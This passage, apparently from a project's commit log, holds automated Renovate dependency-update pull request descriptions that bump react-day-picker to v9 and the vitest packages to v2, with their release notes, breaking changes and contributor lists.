This update improves backward compatibility with v8.10.1.
#### What's Changed
- fix: prop types not being correctly interpreted by TS by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2283 ](https://redirect.github.com/gpbl/react-day-picker/pull/2283 )
- feat: add `DeprecatedUI` enum by [@​gpbl](https://redirect.github.com/gpbl ) in [https://github.com/gpbl/react-day-picker/pull/2284 ](https://redirect.github.com/gpbl/react-day-picker/pull/2284 )
**Full Changelog**: https://github.com/gpbl/react-day-picker/compare/v9.0.0...v9.0.1
### [`v9.0.0`](https://redirect.github.com/gpbl/react-day-picker/releases/tag/v9.0.0 )
[Compare Source](https://redirect.github.com/gpbl/react-day-picker/compare/v8.10.1...v9.0.0 )
DayPicker v9 is a major release including significant updates related to accessibility, customization and localization.
- See the updated docs at https://daypicker.dev and the [upgrading Guide](https://daypicker.dev/upgrading ) for more details.
##### Install the Latest Version
```bash
npm install react-day-picker@latest
```
#### What’s New
- Moved `date-fns` from peer dependencies to dependencies.
- Added support for [UTC dates](https://daypicker.dev/docs/localization#utc-dates ) and [Jalali Calendar](https://daypicker.dev/docs/localization#jalali-calendar ).
- [Enhanced accessibility](https://daypicker.dev/docs/accessibility ) to better comply with [WCAG 2.1](https://www.w3.org/TR/WCAG21/ ) recommendations.
- [Simplified styles](https://daypicker.dev/docs/styling ) and new CSS variables for easier customization.
- Improved selection logic for [range mode](https://daypicker.dev/docs/selection-modes.mdx ).
- New `dropdown-years` and `dropdown-months` caption layouts.
- New `hideWeekdayRow` and `hideNavigation` props.
- Updated for a complete [custom components](https://daypicker.dev/guides/custom-components ) support.
- Improved typings and props for better compatibility in TypeScript `strict` mode.
#### Breaking Changes
While we tried to keep the API as stable as possible, some breaking changes were necessary to improve the library:
- The updated ARIA labels could require new translations or updated unit tests selectors.
- Custom CSS styles will likely break, due to the updated CSS classes and simplified styles.
- Custom Components have new API and may break.
- Some typings have been renamed or deprecated.
- The `useInput` hook has been removed. See [Input fields](https://daypicker.dev/guides/input-fields ) guide for more details.
- `onWeekNumberClick` has been removed. Use a custom component to handle week number clicks.
- The updated build system to ESM and CommonJS could break some custom bundler.
##### Upgrading Guide
We prepared a [Upgrading guide](https://daypicker.dev/upgrading ) for help upgrading your app to v9. We welcome [feedback](https://redirect.github.com/gpbl/react-day-picker/discussions ) about the upgrade process, to ensure it's smooth for everyone.
#### Compatibility
DayPicker v9 is compatible with React 16.8+.
#### Get Support and Report Issues
Get support, report issues, and provide feedback on the [Discussion forums](https://redirect.github.com/gpbl/react-day-picker/discussions ). Thanks.
#### New Contributors
- [@​grzegorzpokorski](https://redirect.github.com/grzegorzpokorski ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2124 ](https://redirect.github.com/gpbl/react-day-picker/pull/2124 )
- [@​zaaakher](https://redirect.github.com/zaaakher ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2137 ](https://redirect.github.com/gpbl/react-day-picker/pull/2137 )
- [@​ArthurGoupil](https://redirect.github.com/ArthurGoupil ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2230 ](https://redirect.github.com/gpbl/react-day-picker/pull/2230 )
- [@​johnnysedh3lllo](https://redirect.github.com/johnnysedh3lllo ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2252 ](https://redirect.github.com/gpbl/react-day-picker/pull/2252 )
- [@​xardit](https://redirect.github.com/xardit ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2254 ](https://redirect.github.com/gpbl/react-day-picker/pull/2254 )
- [@​dave-meyer](https://redirect.github.com/dave-meyer ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2231 ](https://redirect.github.com/gpbl/react-day-picker/pull/2231 )
- [@​benasher44](https://redirect.github.com/benasher44 ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2249 ](https://redirect.github.com/gpbl/react-day-picker/pull/2249 )
- [@​RyanCavanaugh](https://redirect.github.com/RyanCavanaugh ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2275 ](https://redirect.github.com/gpbl/react-day-picker/pull/2275 )
- [@​kesoji](https://redirect.github.com/kesoji ) made their first contribution in [https://github.com/gpbl/react-day-picker/pull/2281 ](https://redirect.github.com/gpbl/react-day-picker/pull/2281 )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM4LjU5LjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19-->
2024-09-03 10:28:42 +00:00
renovate
106f332c19
chore: bump up vitest monorepo to v2 (major) ( #7449 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@vitest/coverage-istanbul](https://togithub.com/vitest-dev/vitest/tree/main/packages/coverage-istanbul#readme ) ([source](https://togithub.com/vitest-dev/vitest/tree/HEAD/packages/coverage-istanbul )) | [`1.6.0` -> `2.0.5`](https://renovatebot.com/diffs/npm/@vitest%2fcoverage-istanbul/1.6.0/2.0.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@vitest/ui](https://togithub.com/vitest-dev/vitest/tree/main/packages/ui#readme ) ([source](https://togithub.com/vitest-dev/vitest/tree/HEAD/packages/ui )) | [`1.6.0` -> `2.0.5`](https://renovatebot.com/diffs/npm/@vitest%2fui/1.6.0/2.0.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [vitest](https://togithub.com/vitest-dev/vitest ) ([source](https://togithub.com/vitest-dev/vitest/tree/HEAD/packages/vitest )) | [`1.6.0` -> `2.0.5`](https://renovatebot.com/diffs/npm/vitest/1.6.0/2.0.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>vitest-dev/vitest (@​vitest/coverage-istanbul)</summary>
### [`v2.0.5`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.5 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v2.0.4...v2.0.5 )
##### 🚀 Features
- Introduce experimental reported tasks - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6149 ](https://togithub.com/vitest-dev/vitest/issues/6149 ) [<samp>(13d85)</samp>](https://togithub.com/vitest-dev/vitest/commit/13d85bd1 )
- This is part of the experimental API and doesn't follow semver. We are hoping to stabilize it for 2.1. If you are working with custom reporters, give this a go!
##### 🐞 Bug Fixes
- Show a difference between string characters if both values are strings - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6191 ](https://togithub.com/vitest-dev/vitest/issues/6191 ) [<samp>(29176)</samp>](https://togithub.com/vitest-dev/vitest/commit/291766d7 )
- `testNamePattern` adds leading space - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6186 ](https://togithub.com/vitest-dev/vitest/issues/6186 ) [<samp>(073a5)</samp>](https://togithub.com/vitest-dev/vitest/commit/073a50c9 )
- **browser**:
- Don't bundle `afterEach` cleanup hooks in node entrypoint - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6192 ](https://togithub.com/vitest-dev/vitest/issues/6192 ) [<samp>(e6fbc)</samp>](https://togithub.com/vitest-dev/vitest/commit/e6fbc620 )
- UserEvent.setup initiates a separate state for userEvent instance - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6088 ](https://togithub.com/vitest-dev/vitest/issues/6088 ) [<samp>(883f3)</samp>](https://togithub.com/vitest-dev/vitest/commit/883f3482 )
- Correctly import optimized module in vi.importActual - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6219 ](https://togithub.com/vitest-dev/vitest/issues/6219 ) [<samp>(804ff)</samp>](https://togithub.com/vitest-dev/vitest/commit/804ff2fd )
- Passing options to hover/unhover - by [@​MNeverOff](https://togithub.com/MNeverOff ) in [https://github.com/vitest-dev/vitest/issues/6175 ](https://togithub.com/vitest-dev/vitest/issues/6175 ) [<samp>(d4c00)</samp>](https://togithub.com/vitest-dev/vitest/commit/d4c005bc )
- Improve unique CSS selector generation - by [@​zacharyvoase](https://togithub.com/zacharyvoase ) and **Zack Voase** in [https://github.com/vitest-dev/vitest/issues/6243 ](https://togithub.com/vitest-dev/vitest/issues/6243 ) [<samp>(e7acd)</samp>](https://togithub.com/vitest-dev/vitest/commit/e7acd0cf )
- **vitest**:
- Remove nuxt from auto inline deps - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(93882)</samp>](https://togithub.com/vitest-dev/vitest/commit/93882f38 )
- Improve `defineProject` and `defineWorkspace` types - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6198 ](https://togithub.com/vitest-dev/vitest/issues/6198 ) [<samp>(8cd82)</samp>](https://togithub.com/vitest-dev/vitest/commit/8cd8272b )
- Correctly resolve mocked `node:*` imports in `__mocks__` folder - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6204 ](https://togithub.com/vitest-dev/vitest/issues/6204 ) [<samp>(a48be)</samp>](https://togithub.com/vitest-dev/vitest/commit/a48be6ff )
- **web-worker**:
- Expose globals on self - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6170 ](https://togithub.com/vitest-dev/vitest/issues/6170 ) [<samp>(12bb5)</samp>](https://togithub.com/vitest-dev/vitest/commit/12bb567e )
##### [View changes on GitHub](https://togithub.com/vitest-dev/vitest/compare/v2.0.4...v2.0.5 )
### [`v2.0.4`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.4 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v2.0.3...v2.0.4 )
##### 🐞 Bug Fixes
- One-line environment options - by [@​hahanein](https://togithub.com/hahanein ) in [https://github.com/vitest-dev/vitest/issues/5105 ](https://togithub.com/vitest-dev/vitest/issues/5105 ) [<samp>(38269)</samp>](https://togithub.com/vitest-dev/vitest/commit/38269415 )
- Resolve assets imported with `require` - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6159 ](https://togithub.com/vitest-dev/vitest/issues/6159 ) [<samp>(807a2)</samp>](https://togithub.com/vitest-dev/vitest/commit/807a2cbc )
- **browser**:
- Don't panic if [@​vitest/browser](https://togithub.com/vitest/browser ) is installed outside of project root - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6135 ](https://togithub.com/vitest-dev/vitest/issues/6135 ) [<samp>(ccfcd)</samp>](https://togithub.com/vitest-dev/vitest/commit/ccfcd488 )
- Set global filepath - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6190 ](https://togithub.com/vitest-dev/vitest/issues/6190 ) [<samp>(0d0b4)</samp>](https://togithub.com/vitest-dev/vitest/commit/0d0b46b1 )
- Allow preview and open in the editor screenshot error from ui - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/6113 ](https://togithub.com/vitest-dev/vitest/issues/6113 ) [<samp>(2d620)</samp>](https://togithub.com/vitest-dev/vitest/commit/2d62051f )
- **coverage**:
- Global thresholds to include files from glob thresholds - by [@​thor-juhasz](https://togithub.com/thor-juhasz ) and [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6172 ](https://togithub.com/vitest-dev/vitest/issues/6172 ) [<samp>(02e3f)</samp>](https://togithub.com/vitest-dev/vitest/commit/02e3f003 )
- Consistent type-only file handling - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6183 ](https://togithub.com/vitest-dev/vitest/issues/6183 ) [<samp>(90576)</samp>](https://togithub.com/vitest-dev/vitest/commit/90576148 )
- Ignore `*.cts` files - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6189 ](https://togithub.com/vitest-dev/vitest/issues/6189 ) [<samp>(5da45)</samp>](https://togithub.com/vitest-dev/vitest/commit/5da45db1 )
- Add `thresholds.<glob>.100` option - by [@​thor-juhasz](https://togithub.com/thor-juhasz ) and [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6174 ](https://togithub.com/vitest-dev/vitest/issues/6174 ) [<samp>(f6845)</samp>](https://togithub.com/vitest-dev/vitest/commit/f68453f8 )
- **spy**:
- Fix `mockImplementation` for function overload and unions - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) in [https://github.com/vitest-dev/vitest/issues/6181 ](https://togithub.com/vitest-dev/vitest/issues/6181 ) [<samp>(7a75b)</samp>](https://togithub.com/vitest-dev/vitest/commit/7a75bd4c )
##### [View changes on GitHub](https://togithub.com/vitest-dev/vitest/compare/v2.0.3...v2.0.4 )
### [`v2.0.3`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.3 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v2.0.2...v2.0.3 )
##### 🚀 Features
- **ui**: Show all suites/tests when parent matches - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/6106 ](https://togithub.com/vitest-dev/vitest/issues/6106 ) [<samp>(840e0)</samp>](https://togithub.com/vitest-dev/vitest/commit/840e02f1 )
##### 🐞 Bug Fixes
- `--inspect-brk` stop on Windows - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6110 ](https://togithub.com/vitest-dev/vitest/issues/6110 ) [<samp>(f8519)</samp>](https://togithub.com/vitest-dev/vitest/commit/f851982e )
- **browser**:
- Don't import from "vite" - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(35655)</samp>](https://togithub.com/vitest-dev/vitest/commit/35655419 )
- Allow immidiate reinvalidation of mocked dependencies - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6108 ](https://togithub.com/vitest-dev/vitest/issues/6108 ) [<samp>(f44cc)</samp>](https://togithub.com/vitest-dev/vitest/commit/f44cc917 )
- **spy**:
- Fix type error when assigning `vi.spyOn` to `MockInstance` of function overload - by [@​hi-ogawa](https://togithub.com/hi-ogawa ) in [https://github.com/vitest-dev/vitest/issues/6086 ](https://togithub.com/vitest-dev/vitest/issues/6086 ) [<samp>(e9f9a)</samp>](https://togithub.com/vitest-dev/vitest/commit/e9f9adcd )
- **vite-node**:
- Remove suffix slash on file protocol for window - by [@​syi0808](https://togithub.com/syi0808 ) in [https://github.com/vitest-dev/vitest/issues/6109 ](https://togithub.com/vitest-dev/vitest/issues/6109 ) [<samp>(93ebd)</samp>](https://togithub.com/vitest-dev/vitest/commit/93ebdefc )
##### [View changes on GitHub](https://togithub.com/vitest-dev/vitest/compare/v2.0.2...v2.0.3 )
### [`v2.0.2`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.2 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v2.0.1...v2.0.2 )
##### 🐞 Bug Fixes
- **browser**:
- Remove [@​vitest/runner](https://togithub.com/vitest/runner ) > pretty-format from prebundling because it doesn't exist - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6075 ](https://togithub.com/vitest-dev/vitest/issues/6075 ) [<samp>(a169d)</samp>](https://togithub.com/vitest-dev/vitest/commit/a169d25a )
- Inline pretty-format and replace picocolors with tinyrainbow - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6077 ](https://togithub.com/vitest-dev/vitest/issues/6077 ) [<samp>(80a43)</samp>](https://togithub.com/vitest-dev/vitest/commit/80a43d5c )
- Remove `crypto.randomUUID` from the client - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/6079 ](https://togithub.com/vitest-dev/vitest/issues/6079 ) [<samp>(04c83)</samp>](https://togithub.com/vitest-dev/vitest/commit/04c83acc )
- Correctly overwrite loupe require - by [@​sheremet-va](https://togithub.com/sheremet-va ) [<samp>(756ac)</samp>](https://togithub.com/vitest-dev/vitest/commit/756ac2bc )
- Dedupe @​vitest/browser/client - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6081 ](https://togithub.com/vitest-dev/vitest/issues/6081 ) [<samp>(ee725)</samp>](https://togithub.com/vitest-dev/vitest/commit/ee725184 )
- Don't release keyboard automatically - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6083 ](https://togithub.com/vitest-dev/vitest/issues/6083 ) [<samp>(58fac)</samp>](https://togithub.com/vitest-dev/vitest/commit/58fac77b )
- **ui**:
- Test files notified only when running - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/6069 ](https://togithub.com/vitest-dev/vitest/issues/6069 ) [<samp>(af7fe)</samp>](https://togithub.com/vitest-dev/vitest/commit/af7fec58 )
- Encode html entities in task name - by [@​userquin](https://togithub.com/userquin ) and [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6070 ](https://togithub.com/vitest-dev/vitest/issues/6070 ) [<samp>(7f0cc)</samp>](https://togithub.com/vitest-dev/vitest/commit/7f0cc24e )
- **web-worker**:
- Peer dependency version on `vitest` - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/6060 ](https://togithub.com/vitest-dev/vitest/issues/6060 ) [<samp>(95a2d)</samp>](https://togithub.com/vitest-dev/vitest/commit/95a2d870 )
##### 🏎 Performance
- **browser**: Don't import msw if no modules are mocked - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6073 ](https://togithub.com/vitest-dev/vitest/issues/6073 ) [<samp>(aa527)</samp>](https://togithub.com/vitest-dev/vitest/commit/aa52792a )
##### [View changes on GitHub](https://togithub.com/vitest-dev/vitest/compare/v2.0.1...v2.0.2 )
### [`v2.0.1`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.1 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v2.0.0...v2.0.1 )
##### 🐞 Bug Fixes
- **browser**: Correctly inherit browser config in a workspace - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6054 ](https://togithub.com/vitest-dev/vitest/issues/6054 ) [<samp>(4b03e)</samp>](https://togithub.com/vitest-dev/vitest/commit/4b03e72b )
- **ui**: Move virtual scroller to dev dependencies - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/6053 ](https://togithub.com/vitest-dev/vitest/issues/6053 ) [<samp>(f94ed)</samp>](https://togithub.com/vitest-dev/vitest/commit/f94ede02 )
- **vitest**: Print only running files, not every file - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6052 ](https://togithub.com/vitest-dev/vitest/issues/6052 ) [<samp>(4d559)</samp>](https://togithub.com/vitest-dev/vitest/commit/4d5597df )
##### [View changes on GitHub](https://togithub.com/vitest-dev/vitest/compare/v2.0.0...v2.0.1 )
### [`v2.0.0`](https://togithub.com/vitest-dev/vitest/releases/tag/v2.0.0 )
[Compare Source](https://togithub.com/vitest-dev/vitest/compare/v1.6.0...v2.0.0 )
Vitest 2.0 is here! This release page lists all changes made to the project during the beta. For the migration guide, please refer to the [documentation](https://vitest.dev/guide/migration.html#migrating-to-vitest-2-0 ).
##### 🚨 Breaking Changes
- Simplify mock function generic types and align with jest - by **[@​hi-ogawa](https://togithub.com/hi-ogawa )** in [https://github.com/vitest-dev/vitest/pull/4784 ](https://togithub.com/vitest-dev/vitest/pull/4784 ) [<samp>(a0c1d37)</samp>](a0c1d371ed )
- Remove `--segfault-retry` - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5514 ](https://togithub.com/vitest-dev/vitest/issues/5514 ) [<samp>(ed60e)</samp>](https://togithub.com/vitest-dev/vitest/commit/ed60e405e )
- This flag was introduced to combat `threads` segfaults. Our current recommendation is to use the new default `forks` pool instead.
- Run suite hooks in a stack - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5609 ](https://togithub.com/vitest-dev/vitest/issues/5609 ) [<samp>(1277d)</samp>](https://togithub.com/vitest-dev/vitest/commit/1277dc1e3 )
- This feels like a more sensible default. Especially with the new [`onTestFinished`](https://vitest.dev/api/#ontestfinished ) hook. This can make your tests run a little bit slower.
- Enable `coverage.ignoreEmptyLines` by default - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5543 ](https://togithub.com/vitest-dev/vitest/issues/5543 ) [<samp>(31994)</samp>](https://togithub.com/vitest-dev/vitest/commit/31994942f )
- ⚠️ This change may cause significant differences in your coverage results compared to Vitest v1. These changes are expected as coverage reporting is now more accurate. See [https://github.com/vitest-dev/vitest/issues/5423 ](https://togithub.com/vitest-dev/vitest/issues/5423 ) for more details.
- Add correct location and snapshot fields in json reporter - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5434 ](https://togithub.com/vitest-dev/vitest/issues/5434 ) [<samp>(bcccc)</samp>](https://togithub.com/vitest-dev/vitest/commit/bcccce6df )
- Previously, the `location` field pointed to the error location instead of the test location. Now it is aligned with jest and contains the `line` and `column` of a test function, but requires [`includeTaskLocation`](https://vitest.dev/config/#includeTaskLocation ) to be enabled.
- Update dependency chai to v5 - by **renovate\[bot]** and [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5135 ](https://togithub.com/vitest-dev/vitest/issues/5135 ) [<samp>(73646)</samp>](https://togithub.com/vitest-dev/vitest/commit/73646b638 )
- Remove watchExclude - by [@​patak-dev](https://togithub.com/patak-dev ) in [https://github.com/vitest-dev/vitest/issues/5177 ](https://togithub.com/vitest-dev/vitest/issues/5177 ) [<samp>(d7371)</samp>](https://togithub.com/vitest-dev/vitest/commit/d7371eae3 )
- Change default `pool` to `'forks'` - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5047 ](https://togithub.com/vitest-dev/vitest/issues/5047 ) [<samp>(7f8f9)</samp>](https://togithub.com/vitest-dev/vitest/commit/7f8f9c0c0 )
- This change is done for compatibility issues
- This pool may be slightly slower than previous `threads` pool: https://vitest.dev/guide/improving-performance.html#pool
- `--merge-reports` to support coverage - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5736 ](https://togithub.com/vitest-dev/vitest/issues/5736 ) [<samp>(b7438)</samp>](https://togithub.com/vitest-dev/vitest/commit/b7438b9be )
- Add promise-based return assertions, do not auto-resolve returned promises - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5749 ](https://togithub.com/vitest-dev/vitest/issues/5749 ) [<samp>(5f710)</samp>](https://togithub.com/vitest-dev/vitest/commit/5f710182e )
- ⚠️ Vitest no longer unwraps promises in `spy.mock.returns`. If the function is async or returns a promise, it will always succeed and have a `Promise` in `results`. To make migration easier, we introduced `spy.mock.settledResults` that unwraps promises and `expect().toHaveResolved()` matcher that accepts unwrapped value.
- Do not exit process if global setup has failed - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5726 ](https://togithub.com/vitest-dev/vitest/issues/5726 ) [<samp>(ddb09)</samp>](https://togithub.com/vitest-dev/vitest/commit/ddb09eb12 )
- Don't exit process if config failed - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5715 ](https://togithub.com/vitest-dev/vitest/issues/5715 ) [<samp>(f232f)</samp>](https://togithub.com/vitest-dev/vitest/commit/f232fdd61 )
- Add meta to `json` output - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5802 ](https://togithub.com/vitest-dev/vitest/issues/5802 ) [<samp>(dd754)</samp>](https://togithub.com/vitest-dev/vitest/commit/dd754c103 )
- Rename `indexScripts` to `orchestratorScripts` in the browser config - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5842 ](https://togithub.com/vitest-dev/vitest/issues/5842 ) [<samp>(49f34)</samp>](https://togithub.com/vitest-dev/vitest/commit/49f34ec47 )
- Add "vitest list" API to print collected tests without running them - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/6013 ](https://togithub.com/vitest-dev/vitest/issues/6013 ) [<samp>(583dd)</samp>](https://togithub.com/vitest-dev/vitest/commit/583dd8a98 )
- ⚠️ This changes the custom `pool` API - now requires `collectTests` method alongside `runTests`.
- Remove the empty suite from the runner - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5435 ](https://togithub.com/vitest-dev/vitest/issues/5435 ) [<samp>(dbbbe)</samp>](https://togithub.com/vitest-dev/vitest/commit/dbbbe4304 )
- Support concurrent suites - by **[@​hi-ogawa](https://togithub.com/hi-ogawa )** in [https://github.com/vitest-dev/vitest/pull/5491 ](https://togithub.com/vitest-dev/vitest/pull/5491 ) [<samp>(222ce44)</samp>](222ce44119 )
- Support overriding `exclude` in coverage - by [@​AriPerkkio](https://togithub.com/AriPerkkio ) in [https://github.com/vitest-dev/vitest/issues/5997 ](https://togithub.com/vitest-dev/vitest/issues/5997 ) [<samp>(169bc)</samp>](https://togithub.com/vitest-dev/vitest/commit/169bc1fde )
- ⚠️ Vitest coverage no longer adds test files to `exclude` patterns if `coverage.exclude` was overridden in the config. Add your test patterns manually, or merge your overrides with default ones: `['**/my-pattern.js', ...coverageConfigDefaults.exclude]`. See https://vitest.dev/config/#coverage-exclude for an example.
##### 🚀 Features
<img width="1392" alt="Running tresjs example in Vitest BrowserMode" src="https://github.com/vitest-dev/vitest/assets/16173870/3b6bc721-b194-416d-a685-cf7282ee802a ">
- **browser**:
- 🌐 This release lays the groundwork for the next iteration of Vitest Browser Mode. You can read more about our future plans at [https://github.com/vitest-dev/vitest/discussions/5828 ](https://togithub.com/vitest-dev/vitest/discussions/5828 )
- Add commands to communicate betweens server and the browser - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5097 ](https://togithub.com/vitest-dev/vitest/issues/5097 ) [<samp>(aa431)</samp>](https://togithub.com/vitest-dev/vitest/commit/aa431f4db )
- Do not reload the page during watch mode - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5810 ](https://togithub.com/vitest-dev/vitest/issues/5810 ) [<samp>(e5b9a)</samp>](https://togithub.com/vitest-dev/vitest/commit/e5b9a0be4 )
- Support changing the viewport - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5811 ](https://togithub.com/vitest-dev/vitest/issues/5811 ) [<samp>(71851)</samp>](https://togithub.com/vitest-dev/vitest/commit/718512d80 )
- Add browser iframe mouse interaction - by [@​userquin](https://togithub.com/userquin ) in [https://github.com/vitest-dev/vitest/issues/5815 ](https://togithub.com/vitest-dev/vitest/issues/5815 ) [<samp>(f29b9)</samp>](https://togithub.com/vitest-dev/vitest/commit/f29b9d408 )
- Support `click` event - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5777 ](https://togithub.com/vitest-dev/vitest/issues/5777 ) [<samp>(839c3)</samp>](https://togithub.com/vitest-dev/vitest/commit/839c39f06 )
- Rename none provider to preview, make it default - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5826 ](https://togithub.com/vitest-dev/vitest/issues/5826 ) [<samp>(18310)</samp>](https://togithub.com/vitest-dev/vitest/commit/1831008b1 )
- Run tests in parallel in headless mode, add `page.screenshot` method - by [@​sheremet-va](https://togithub.com/sheremet-va ) in [https://github.com/vitest-dev/vitest/issues/5853 ](https://togithub.com/vitest-dev/vitest/issues/5853 ) [<samp>(81c42)</samp>](https://togithub.com/vitest-dev/vitest/commit/81c42fc8a )
